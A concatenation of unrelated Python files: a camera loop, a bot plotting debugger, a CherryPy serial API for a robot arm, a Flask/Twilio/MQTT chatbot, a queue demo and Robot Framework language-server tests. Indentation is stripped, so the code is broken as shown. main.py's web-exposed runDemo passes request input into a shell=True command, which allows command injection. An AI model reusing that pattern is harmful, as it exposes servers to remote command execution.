frame = 20*img.get_image_data_numpy()
# frame = video_capture.read()
if frame_count % qu_limit == 0:
input_q.put(frame)
if output_q.empty():
pass # fill up queue
# else:
# cv2.imshow('Video', frame)
# if frame_count % 500 ==0 :
# print('[INFO] Live . FPS: {:.2f}'.format(fps.fps()))
fps.update()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
cam.stop_acquisition()
print("Max camera framerate :",cam.get_param('framerate:max'))
cam.close_device()
cv2.destroyAllWindows()
|
BotDebugger.py
|
import numpy as np
import matplotlib.pyplot as mpl
from threading import Thread
import time
import traceback
import Const
def CF(pct):
if pct == Const.PL_C:
return 'y'
if pct == Const.PL_O:
return 'b'
if pct == 'E':
return 'r'
if pct == -1:
return 'k'
return 'g'
class BotDebugger:
def __init__(self, B):
self.ax = None
self.sct = None #Debug: Scatter plot for displaying grid
self.lf = False #Loop flag
self.B = B #The bot to debug
def DisplayPred(self):
for i in range(self.B.ts.m):
for j in range(self.B.ts.n):
rv = self.B.ts.CellLookup((i, j))
if rv is None:
rv = 'N'
print('{:4s}'.format(rv), end = '')
print('')
def PlotMap(self):
mm = self.B.mm
cp = mm.GetPosition()
if self.B.p is not None:
ppx = [self.B.p[0], cp[0]]
ppy = [self.B.p[1], cp[1]]
else:
ppx, ppy = [cp[0]], [cp[1]]
pc = ['r', 'g']
C, CC = [], []
for qp in mm.GetCells():
C.append(qp[0:2])
CC.append(mm.GetCellType(qp))
C = np.stack(C)
if self.sct is None:
mpl.ion()
fig, self.ax = mpl.subplots()
fig.canvas.manager.window.setGeometry(840, 5, 640, 545)
self.sct = 1
else:
self.ax.clear()
self.ax.scatter(C[:, 0], C[:, 1], color = [CF(j) for j in CC])
self.ax.scatter(ppx, ppy, c = pc, s = 64)
self.ax.scatter([mm.hp[0]], [mm.hp[1]], color = 'm', s = 64)
self.ax.set_title("At: " + str(cp))
mpl.pause(0.1)
def PlotLoopT(self):
while self.lf:
try:
self.PlotMap()
except:
traceback.print_exc()
time.sleep(0.5)
def PlotLoop(self):
self.lf = True
thrd = Thread(target = self.PlotLoopT)
thrd.start()
def PlotStop(self):
self.lf = False
|
main.py
|
#NAME: main.py
#DATE: Tuesday 6th August 2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python script for running a CherryPy API as a serial passthrough
#COPY: Copyright 2019, All Rights Reserved, Ryan McCartney
import subprocess
import threading
import cherrypy
import signal
import serial
import time
import json
import os
configFilePath = "http_api/settings.json"
#define threading wrapper
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
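#Usage sketch (hypothetical function, illustration only): because the wrapper
#returns the Thread object, callers can keep the handle and join it later.
#
#    @threaded
#    def backgroundTask(duration):
#        time.sleep(duration)
#
#    handle = backgroundTask(2)   #returns immediately
#    handle.join()                #optionally wait for completion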
try:
class API(object):
def __init__(self,configFilePath):
            self.loadConfig(configFilePath)
            #Initialise other Variables
self.headers = ["Timestamp","Info","Joint 0","Joint 1","Joint 2","Joint 3","Joint 4","Joint 5"]
self.serialMonitorData = ["-,-,-,-,-,-,-,-"]*self.serialMonitorLines
self.connected = False
self.latestMessage = ""
self.previousMessage = ""
self.indexPrepared = False
self.processes = []
#Update Server Port
cherrypy.config.update(
{'server.socket_host': '0.0.0.0',
'server.socket_port': self.serverPort}
)
#On startup try to connect to serial
self.connect()
time.sleep(3)
self.runDemo(self.xboxControlPath)
def loadConfig(self,configFilePath):
with open(configFilePath) as configFile:
config = json.load(configFile)
self.serverName = config["serverName"]
self.serverPort = config["serverPort"]
self.serialPort = config["serialPort"]
self.baudrate = config["baudrate"]
self.serialMonitorLines = config["serialMonitorLines"]
self.hostname = config["hostname"]
self.xboxControlPath = config["xboxScript"]
@cherrypy.expose
def index(self):
if not self.indexPrepared:
self.prepareIndex()
with open ("http_api/index.html", "r") as webPage:
contents=webPage.readlines()
return contents
def prepareIndex(self):
contents = ""
with open("http_api/baseIndex.html", "rt") as webPageIn:
for line in webPageIn:
contents += line.replace('SERVERNAMEFEILD',self.serverName)
with open("http_api/index.html", "wt") as webPageOut:
webPageOut.write(contents)
self.indexPrepared = True
@cherrypy.expose
def demos(self):
with open ("http_api/demo.html", "r") as webPage:
contents=webPage.readlines()
return contents
@cherrypy.expose
def runDemo(self,demoPath):
try:
self.stopDemos()
cwd = os.getcwd()
fullPath = cwd+demoPath
command = "exec python3 "+fullPath
p = subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)
time.sleep(2)
self.processes.append(p)
status = "Successfully Running Demo from '"+str(demoPath)+"' with PID: "+str(p.pid)+"."
except:
status = "Failed to run '"+str(demoPath)+"'."
print(status)
return status
@cherrypy.expose
def stopDemos(self):
status = "Successfully Terminated Demos."
try:
while self.processes:
p = self.processes.pop()
p.kill()
time.sleep(1)
status = "INFO: Terminated Process "+str(p.pid)+"."
print(status)
except:
status = "Failed to terminate demo scripts."
print(status)
return status
@cherrypy.expose
def clearLogs(self):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
#Clear Transmit Log
log = open("http_api/public/transmitLog.csv","w")
log.write("Date and Time,Command String Passed\n")
log.close()
#Clear Receive Log
log = open("http_api/public/receiveLog.csv","w")
log.write("Date and Time,Robotic Arm Response\n")
log.close()
#Clear serial monitor
self.serialMonitorData = ["-,-,-,-,-,-,-,-"]*self.serialMonitorLines
#Return Message
status = currentDateTime + " - INFO: Transmit and Receive Logs have been cleared."
print(status)
return status
@cherrypy.expose
def send(self,command="this"):
#Get Current Date and Time for Logging
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
if not self.connected:
status = self.connect()
try:
#Add command to transmit log
with open ("http_api/public/transmitLog.csv", "a+") as log:
log.write(currentDateTime+","+command+"\n")
#Write Command Passed to Serial Port
payload = (command+'\n').encode('ascii')
self.serial.write(payload)
time.sleep(0.008)
                status = currentDateTime + " - INFO: '" + command + "' sent successfully."
except:
status = currentDateTime + " - ERROR: Could not send '"+ command +"' to serial port. Check connection."
self.connected = False
print(status)
return status
@threaded
def receive(self):
#Initialise array to store data serial monitor data
self.serialMonitorData = ["-,-"]*self.serialMonitorLines
while self.connected == True:
#Get Current Date and Time for Logging
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
                #Read Response if Available
response = "VOID"
try:
if self.serial.in_waiting > 0:
response = self.serial.readline().decode('utf-8')
response = response.strip()
logLine = currentDateTime+","+str(response)
self.latestMessage = response
#Add response to receive log
with open ("http_api/public/receiveLog.csv", "a+") as log:
log.write(logLine+"\n")
#Add received data to serial monitor array
self.serialMonitorData.pop(0)
self.serialMonitorData.append(logLine)
#print(logLine)
if self.serial.in_waiting > 200:
self.serial.reset_input_buffer()
dump = self.serial.readline().decode('utf-8')
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
status = currentDateTime + " - ERROR: Buffer full dumping '"+str(dump)+"'."
#print(status)
except:
self.connected = False
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
status = currentDateTime + " - ERROR: Cannot read serial line."
print(status)
@cherrypy.expose
def serialMonitor(self):
#Add Correct number of Headers
table = "<table><tr>"
for header in self.headers:
table += "<th>"+header+"</th>"
table += "</tr>"
#Get table contents
rows = len(self.serialMonitorData)-1
for i in range(rows,0,-1):
row = self.serialMonitorData[i]
table += "<tr><td width='20%'>"
table += row.replace(",", "</td><td width='10%'>",len(self.headers))
if row.count(',') < len(self.headers):
for i in range(row.count(','),len(self.headers)-1):
table += "</td><td width='10%'>"
table += "</td></tr>"
table +="</table>"
return table
@cherrypy.expose
def getLast(self):
return self.latestMessage
@cherrypy.expose
def getLatest(self):
if self.previousMessage == self.latestMessage:
message = ""
else:
message = self.latestMessage
self.previousMessage = self.latestMessage
return message
@cherrypy.expose
def connect(self):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
status = currentDateTime + " - INFO: Motor control box arduino already connected."
if not self.connected:
try:
#Open Serial Connection
self.serial = serial.Serial(
port= self.serialPort,
baudrate=self.baudrate,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
)
time.sleep(1)
self.connected = True
self.receive()
status = "INFO: Motor control box connected to "+self.serial.name+"."
except:
status = "ERROR: Could not establish a connection with motor control box."
print(status)
return status
@cherrypy.expose
def disconnect(self):
status = "INFO: Motor control box is not connected."
if self.connected:
self.serial.close()
self.connected = False
status = "INFO: Motor control box disconnected."
print(status)
return status
@cherrypy.expose
def getImage(self):
image = "NOT YET OPERATIONAL"
return image
if __name__ == '__main__':
cherrypy.config.update(
{'server.socket_host': '0.0.0.0'}
)
        cherrypy.quickstart(API(configFilePath), '/',
{
'favicon.ico':
{
'tools.staticfile.on': True,
'tools.staticfile.filename': os.path.join(os.getcwd(),'http_api/public/favicon.ico')
},
'/public': {
'tools.staticdir.on' : True,
'tools.staticdir.dir' : os.path.join(os.getcwd(),'http_api/public'),
'tools.staticdir.index' : 'index.html',
'tools.gzip.on' : True
}
}
)
except:
print("ERROR: Main sequence error.")
|
run.py
|
from flask import Flask, request, jsonify
from flask_mqtt import Mqtt
from twilio.twiml.messaging_response import MessagingResponse
import json
import twilio_messaging as messaging
import chatbot
import db
import connect
import visual_recognition as vr
import nlp
import os
import sparrow_handler as sparrow
from time import sleep
from threading import Thread
import paho.mqtt.publish as publish
with open('config.json') as config_file:
config = json.load(config_file)
app = Flask(__name__)
app.config['MQTT_BROKER_URL'] = config["mqtt"]["broker"]
app.config['MQTT_BROKER_PORT'] = config["mqtt"]["port"]
app.config['MQTT_REFRESH_TIME'] = 1.0 # refresh time in seconds
# app.config['MQTT_USERNAME'] = 'user'
# app.config['MQTT_PASSWORD'] = 'secret'
mqtt = Mqtt(app)
mqttPublishBroker=config["mqtt"]["broker"]
mqttPublishPort=config["mqtt"]["port"]
flag_connected = 0
cf_port = os.getenv("PORT")
@app.route('/')
def route():
return "chirrup chirrup....You have reached Sparrow API"
@app.route("/middleware/receive", methods=['GET', 'POST'])
def listen_input():
message = request.values.get('Body', None)
from_no = request.values.get('From', None)
print(message, from_no)
#Handling Media content
num_media = int(request.values.get("NumMedia"))
if num_media > 0:
        media_url = request.values.get('MediaUrl0')
        mime_type = request.values.get('MediaContentType0')
print(media_url, mime_type)
if num_media > 1:
messaging.send_message(from_no, "Multiple media cannot be sent. Sending only first media")
#Handling @sparrow commands
if sparrow.is_sparrow_request(message):
t = Thread(target=sparrow.handle_sparrow_request, args=(from_no, message,))
t.start()
# sparrow.handle_sparrow_request(from_no, message)
return str(MessagingResponse())
receiver = db.getReceiver(from_no)
if receiver == db.IBM_RECEIVER:
if sparrow.is_command(message):
t = Thread(target=sparrow.handle_command, args=(from_no, message))
t.start()
return str(MessagingResponse())
elif num_media > 0:
reply = "Sorry! Our Automated chatbot doesn't support Media at this point."
elif message == "":
reply = "Invalid format. Your message is empty!"
else:
replies = chatbot.handle_message(from_no, message)
if len(replies) > 1:
t = Thread(target=messaging.send_messages, args=(from_no, replies))
t.start()
return(str(MessagingResponse()))
else:
reply = replies[0]
resp = MessagingResponse()
resp.message(reply)
return str(resp)
else:
if num_media > 0:
messaging.send_message_with_media(from_no, receiver, message, media_url, mime_type)
elif message == "":
messaging.send_message(from_no, "Invalid message. Can't be sent")
else:
messaging.send_message(receiver, message)
return str(MessagingResponse())
@app.route("/middleware/connect_expert", methods=['GET', 'POST'])
def connectExpert():
sessionID = request.values.get('sessionID', None)
type = request.values.get('type', None)
userID = db.getUserID(sessionID)
if userID:
expert = connect.connect_expert(userID, type)
return str(expert)
return str("Invalid Session")
@app.route("/middleware/send_message", methods=['GET', 'POST'])
def sendMessage():
userID = request.values.get('userID', None)
message = request.values.get('message', None)
expert = messaging.send_message(userID, message)
return str("Success")
@mqtt.on_connect()
def handle_connect(client, userdata, flags, rc):
mqtt.unsubscribe_all()
mqtt.subscribe('sparrow_receive/+')
@mqtt.on_message()
def handle_mqtt_message(client, userdata, message):
data = dict(
topic=message.topic,
payload=message.payload.decode()
)
# print(data)
message = data["payload"]
from_no = data["topic"].split("/")[1]
print(message, from_no)
if sparrow.is_sparrow_request(message):
sparrow.handle_sparrow_request(from_no, message)
return
receiver = db.getReceiver(from_no)
print(receiver)
if receiver == db.IBM_RECEIVER:
if sparrow.is_command(message):
sparrow.handle_command(from_no, message)
return
reply = chatbot.handle_message(from_no, message)
for message in reply:
mqtt.publish(data["topic"].replace("receive", "response"), message)
sleep(2)
return
else:
messaging.send_message(receiver, message)
return
@app.route("/visual_recognition/text", methods=['POST'])
def recognize_text():
image_url = request.values.get('image_url', None)
# print(image_url)
text = vr.get_text_from_image(image_url)
#return jsonify({'text':text})
return text
@app.route("/nlp/sentiment", methods=['POST'])
def sentiment_of_text():
text = request.values.get('text', None)
sentiment = nlp.get_sentiment_emotions(text)
#return jsonify({'text':text})
return jsonify(sentiment)
@app.route("/nlp/entities", methods=['POST'])
def entities_of_text():
text = request.values.get('text', None)
entities = nlp.get_entities(text)
#return jsonify({'text':text})
return jsonify(entities)
if __name__ == "__main__":
if cf_port is None:
app.run(host='0.0.0.0', port=5000, debug=False)
else:
app.run(host='0.0.0.0', port=int(cf_port), debug=False)
|
192-01-queue.py
|
import logging
import queue
import threading
logging.basicConfig(level=logging.DEBUG, format="%(threadName)s: %(message)s")
def worker1(queue):
logging.debug("start")
while True:
item = queue.get()
if item is None:
break
logging.debug(item)
queue.task_done()
logging.debug("longggggggggggggggggggggg")
logging.debug("end")
if __name__ == "__main__":
    # queue.Queue handles the required locking for us automatically
queue = queue.Queue()
    # Fill the queue with dummy data
for i in range(10):
queue.put(i)
    # Run worker1 in a thread, passing the queue created here as an argument
t1 = threading.Thread(target=worker1, args=(queue,))
t1.start()
logging.debug("tasks are not done")
    # queue.join() will not return until the queue is drained; each get() must be acknowledged with task_done() for join() to complete
queue.join()
logging.debug("tasks are done")
    # queue.join() has completed, but worker1's while loop has not ended, so execution cannot move on; put None (the break sentinel) so the t1 thread can run to its end
queue.put(None)
    # Wait for the t1 thread to terminate
t1.join()
|
test_vscode_robot.py
|
import logging
import os
from pathlib import Path
import threading
import pytest
from robocorp_ls_core.protocols import ILanguageServerClient
from robocorp_ls_core.unittest_tools.cases_fixture import CasesFixture
from robotframework_ls.commands import ROBOT_INTERNAL_RFINTERACTIVE_STOP
from robotframework_ls.impl.robot_lsp_constants import (
OPTION_ROBOT_CODE_FORMATTER_ROBOTIDY,
OPTION_ROBOT_CODE_FORMATTER_BUILTIN_TIDY,
)
from robocorp_ls_core.lsp import MarkupKind
log = logging.getLogger(__name__)
def check_diagnostics(language_server, data_regression):
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robotframework_ls_tests.fixtures import sort_diagnostics
uri = "untitled:Untitled-1.resource"
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri, 1)
assert message_matcher.event.wait(TIMEOUT)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.change_doc(uri, 2, "*** Invalid Invalid ***")
assert message_matcher.event.wait(TIMEOUT)
diag = message_matcher.msg["params"]["diagnostics"]
data_regression.check(sort_diagnostics(diag), basename="diagnostics")
def check_find_definition_data_regression(data_regression, check, basename=None):
check["targetUri"] = os.path.basename(check["targetUri"])
data_regression.check(check, basename=basename)
def test_diagnostics(language_server, ws_root_path, data_regression):
language_server.initialize(ws_root_path, process_id=os.getpid())
import robot
env = {
"PYTHONPATH": os.path.dirname(os.path.dirname(os.path.abspath(robot.__file__)))
}
language_server.settings(
{"settings": {"robot.python.env": env, "robot.lint.robocop.enabled": True}}
)
check_diagnostics(language_server, data_regression)
def test_diagnostics_robocop(language_server, ws_root_path, data_regression):
from robotframework_ls_tests.fixtures import sort_diagnostics
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
language_server.initialize(ws_root_path, process_id=os.getpid())
language_server.settings({"settings": {"robot.lint.robocop.enabled": True}})
uri = "untitled:Untitled-1"
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(uri, 1)
assert message_matcher.event.wait(TIMEOUT)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.change_doc(
uri,
2,
"""
*** Test Cases ***
Test
Fail
Test
Fail
""",
)
assert message_matcher.event.wait(TIMEOUT)
diag = message_matcher.msg["params"]["diagnostics"]
data_regression.check(sort_diagnostics(diag), basename="test_diagnostics_robocop")
def test_diagnostics_robocop_configuration_file(
language_server, ws_root_path, data_regression
):
from robotframework_ls_tests.fixtures import sort_diagnostics
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core import uris
language_server.initialize(ws_root_path, process_id=os.getpid())
language_server.settings({"settings": {"robot.lint.robocop.enabled": True}})
src = os.path.join(ws_root_path, "my", "src")
os.makedirs(src)
target_robot = os.path.join(src, "target.robot")
config_file = os.path.join(ws_root_path, "my", ".robocop")
with open(config_file, "w") as stream:
stream.write(
"""
--exclude missing-doc-test-case
--include missing-doc-suite
"""
)
uri = uris.from_fs_path(target_robot)
message_matcher = language_server.obtain_pattern_message_matcher(
{"method": "textDocument/publishDiagnostics"}
)
language_server.open_doc(
uri,
1,
text="""
*** Test Cases ***
Test
Fail
""",
)
assert message_matcher.event.wait(TIMEOUT)
diag = message_matcher.msg["params"]["diagnostics"]
data_regression.check(
sort_diagnostics(diag), basename="test_diagnostics_robocop_configuration_file"
)
def test_section_completions_integrated(language_server, ws_root_path, data_regression):
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
language_server.change_doc(uri, 2, "*settin")
def check(expected):
completions = language_server.get_completions(uri, 0, 7)
del completions["id"]
data_regression.check(completions, expected)
check("completion_settings_plural")
language_server.settings(
{
"settings": {
"robot": {"completions": {"section_headers": {"form": "singular"}}}
}
}
)
check("completion_settings_singular")
language_server.settings(
{"settings": {"robot": {"completions": {"section_headers": {"form": "both"}}}}}
)
check("completion_settings_both")
language_server.settings(
{
"settings": {
"robot": {"completions": {"section_headers": {"form": "plural"}}}
}
}
)
check("completion_settings_plural")
def test_keyword_completions_integrated_pythonpath_resource(
language_server_tcp, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
case4_path = cases.get_path("case4")
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Settings ***
Resource case4resource.txt
*** Test Cases ***
Check It
Yet Another Equ"""
language_server.change_doc(uri, 2, contents)
language_server_tcp.settings({"settings": {"robot": {"pythonpath": [case4_path]}}})
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
data_regression.check(request_completion())
# After removing the entry from the pythonpath, the resource keyword should no longer be found.
language_server_tcp.settings({"settings": {"robot": {"pythonpath": []}}})
data_regression.check(request_completion(), basename="no_entries")
def test_keyword_completions_integrated_pythonpath_library(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
case1_path = cases.get_path("case1")
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Settings ***
Library case1_library
*** Test Cases ***
Check It
Verify Mod"""
language_server.change_doc(uri, 2, contents)
language_server_tcp.settings({"settings": {"robot": {"pythonpath": [case1_path]}}})
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
data_regression.check(request_completion())
# Note: for libraries, if we found it, we keep it in memory (so, even though
# we removed the entry, it'll still be accessible).
language_server_tcp.settings({"settings": {"robot": {"pythonpath": []}}})
data_regression.check(request_completion())
def test_completions_after_library(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
case1_path = cases.get_path("case1")
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Settings ***
Library """
language_server.change_doc(uri, 2, contents)
language_server_tcp.settings({"settings": {"robot": {"pythonpath": [case1_path]}}})
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
assert not request_completion()["result"]
def test_keyword_completions_prefer_local_library_import(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression, cases
):
from robocorp_ls_core.workspace import Document
from robocorp_ls_core import uris
try:
os.makedirs(ws_root_path)
except:
pass
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
case1_robot_path = cases.get_path("case1/case1.robot")
contents = """
*** Settings ***
Library case1_library
*** Test Cases ***
User can call library
verify model 1
verify_another_mod"""
uri = uris.from_fs_path(case1_robot_path)
language_server.open_doc(uri, 1, text=contents)
def request_completion():
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
return completions
data_regression.check(request_completion())
def test_variables_completions_integrated(
language_server_tcp: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Variables ***
${NAME} Robot Framework
${VERSION} 2.0
${ROBOT} ${NAME} ${VERSION}
*** Test Cases ***
List Variable
Log ${NAME}
Should Contain ${"""
language_server.change_doc(uri, 2, contents)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
data_regression.check(completions, "variable_completions")
# Variables defined via the settings should also be offered as completions.
language_server_tcp.settings({"settings": {"robot": {"variables": {"myvar1": 10}}}})
completions = language_server.get_completions(uri, line, col)
labels = [x["label"] for x in completions["result"]]
assert "${myvar1}" in labels
def test_variables_resolved_on_completion_integrated(
language_server_tcp: ILanguageServerClient, workspace_dir, data_regression, cases
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(workspace_dir, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """*** Settings ***
Library ${ROOT}/directory/my_library.py
*** Keywords ***
Some Keyword
In Lib"""
language_server.change_doc(uri, 2, contents)
# Set the ROOT variable in the settings so that ${ROOT} in the Library import can be resolved.
language_server_tcp.settings(
{
"settings": {
"robot": {"variables": {"ROOT": cases.get_path("case_same_basename")}}
}
}
)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
data_regression.check(completions)
def test_env_variables_resolved_on_completion_integrated(
language_server_tcp: ILanguageServerClient, workspace_dir, data_regression, cases
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(workspace_dir, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """*** Settings ***
Library %{ROOT}/directory/my_library.py
*** Keywords ***
Some Keyword
In Lib"""
language_server.change_doc(uri, 2, contents)
# Set the ROOT environment variable so that %{ROOT} in the Library import can be resolved.
language_server_tcp.settings(
{
"settings": {
"robot": {
"python": {"env": {"ROOT": cases.get_path("case_same_basename")}}
}
}
}
)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
data_regression.check(completions)
contents = """*** Settings ***
Library %{ROOT}/directory/my_library.py
*** Keywords ***
Some Keyword
In Lib 2"""
language_server.change_doc(uri, 2, contents)
definitions = language_server.find_definitions(uri, line, col)
found = definitions["result"]
assert len(found) == 1
assert found[0]["targetUri"].endswith("my_library.py")
def test_snippets_completions_integrated(
language_server_tcp, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
language_server = language_server_tcp
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
contents = """
*** Test Cases ***
List Variable
for in"""
language_server.change_doc(uri, 2, contents)
doc = Document("", source=contents)
line, col = doc.get_last_line_col()
completions = language_server.get_completions(uri, line, col)
del completions["id"]
data_regression.check(completions, "snippet_completions")
def test_restart_when_api_dies(language_server_tcp, ws_root_path, data_regression):
from robocorp_ls_core.basic import kill_process_and_subprocesses
from robocorp_ls_core import basic
from robotframework_ls.server_manager import _ServerApi
import time
# Check just with language_server_tcp as it's easier to kill the subprocess.
server_apis = set()
server_processes = set()
def on_get_robotframework_api_client(server_api):
if (
server_api.robot_framework_language_server
is language_server_tcp.language_server_instance
):
server_apis.add(server_api)
server_processes.add(server_api._server_process.pid)
with basic.after(
_ServerApi, "get_robotframework_api_client", on_get_robotframework_api_client
):
language_server_tcp.initialize(ws_root_path, process_id=os.getpid())
import robot
env = {
"PYTHONPATH": os.path.dirname(
os.path.dirname(os.path.abspath(robot.__file__))
)
}
language_server_tcp.settings(
{"settings": {"robot.python.env": env, "robot.lint.robocop.enabled": True}}
)
processes_per_api = 3
check_diagnostics(language_server_tcp, data_regression)
assert len(server_apis) == processes_per_api
assert len(server_processes) == processes_per_api
check_diagnostics(language_server_tcp, data_regression)
assert len(server_apis) == processes_per_api
assert len(server_processes) == processes_per_api
log.info("Killing server api process.")
for pid in server_processes:
kill_process_and_subprocesses(pid)
# Just make sure the connection is properly dropped before re-requesting.
time.sleep(0.2)
check_diagnostics(language_server_tcp, data_regression)
assert len(server_processes) == processes_per_api * 2
assert len(server_apis) == processes_per_api
def test_missing_message(language_server, ws_root_path):
language_server.initialize(ws_root_path)
# Just ignore this one (it's not a request because it has no id).
language_server.write(
{
"jsonrpc": "2.0",
"method": "invalidMessageSent",
"params": {"textDocument": {"uri": "untitled:Untitled-1", "version": 2}},
}
)
# Make sure that we have a response if it's a request (i.e.: it has an id).
msg = language_server.request(
{
"jsonrpc": "2.0",
"id": "22",
"method": "invalidMessageSent",
"params": {"textDocument": {"uri": "untitled:Untitled-1", "version": 2}},
}
)
assert msg["error"]["code"] == -32601
def test_exit_with_parent_process_died(
language_server_process, language_server_io, ws_root_path
):
"""
:note: Only check with the language_server_io (because that's in another process).
"""
from robocorp_ls_core.subprocess_wrapper import subprocess
import sys
from robocorp_ls_core.basic import is_process_alive
from robocorp_ls_core.basic import kill_process_and_subprocesses
from robocorp_ls_core.unittest_tools.fixtures import wait_for_test_condition
language_server = language_server_io
dummy_process = subprocess.Popen(
[sys.executable, "-c", "import time;time.sleep(10000)"]
)
language_server.initialize(ws_root_path, process_id=dummy_process.pid)
assert is_process_alive(dummy_process.pid)
assert is_process_alive(language_server_process.pid)
kill_process_and_subprocesses(dummy_process.pid)
wait_for_test_condition(lambda: not is_process_alive(dummy_process.pid))
wait_for_test_condition(lambda: not is_process_alive(language_server_process.pid))
language_server_io.require_exit_messages = False
@pytest.mark.parametrize(
"formatter",
[OPTION_ROBOT_CODE_FORMATTER_ROBOTIDY, OPTION_ROBOT_CODE_FORMATTER_BUILTIN_TIDY],
)
def test_code_format_integrated(
language_server, ws_root_path, data_regression, formatter
):
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
language_server.open_doc(uri, 1)
language_server.settings({"settings": {"robot.codeFormatter": formatter}})
language_server.change_doc(uri, 2, "***settings***\nDocumentation Some doc")
ret = language_server.request_source_format(uri)
from robot import get_version
version = get_version(naked=True).split(".")[0]
if version == "5":
if formatter == OPTION_ROBOT_CODE_FORMATTER_BUILTIN_TIDY:
try:
from robot.tidy import Tidy
except ImportError:
pytest.skip("robot.tidy is no longer available.")
version = "4"
basename = "test_code_format_integrated_text_edits_" + formatter
if formatter == OPTION_ROBOT_CODE_FORMATTER_ROBOTIDY:
basename += "_" + version
data_regression.check(
ret,
basename=basename,
)
language_server.change_doc(uri, 3, "[Documentation]\n")
ret = language_server.request_source_format(uri)
assert ret["result"] == []
def test_find_definition_integrated_library(
language_server: ILanguageServerClient, cases, workspace_dir, data_regression
):
from robocorp_ls_core import uris
cases.copy_to("case1", workspace_dir)
language_server.initialize(workspace_dir, process_id=os.getpid())
case1_robot = os.path.join(workspace_dir, "case1.robot")
assert os.path.exists(case1_robot)
uri = uris.from_fs_path(case1_robot)
language_server.open_doc(uri, 1, text=None)
ret = language_server.find_definitions(uri, 5, 6)
result = ret["result"]
assert len(result) == 1
check = next(iter(result))
check_find_definition_data_regression(
data_regression, check, basename="test_find_definition_integrated_library"
)
def test_find_definition_keywords(
language_server: ILanguageServerClient, cases, workspace_dir, data_regression
):
from robocorp_ls_core import uris
cases.copy_to("case2", workspace_dir)
language_server.initialize(workspace_dir, process_id=os.getpid())
case2_robot = os.path.join(workspace_dir, "case2.robot")
assert os.path.exists(case2_robot)
uri = uris.from_fs_path(case2_robot)
language_server.open_doc(uri, 1, text=None)
ret = language_server.find_definitions(uri, 7, 6)
result = ret["result"]
assert len(result) == 1
check = next(iter(result))
check_find_definition_data_regression(
data_regression, check, basename="test_find_definition_keywords"
)
def test_signature_help_integrated(
language_server_io: ILanguageServerClient, ws_root_path, data_regression
):
from robocorp_ls_core.workspace import Document
language_server = language_server_io
language_server.initialize(ws_root_path, process_id=os.getpid())
uri = "untitled:Untitled-1"
txt = """
*** Test Cases ***
Log It
Log """
doc = Document("", txt)
language_server.open_doc(uri, 1, txt)
line, col = doc.get_last_line_col()
ret = language_server.request_signature_help(uri, line, col)
result = ret["result"]
signatures = result["signatures"]
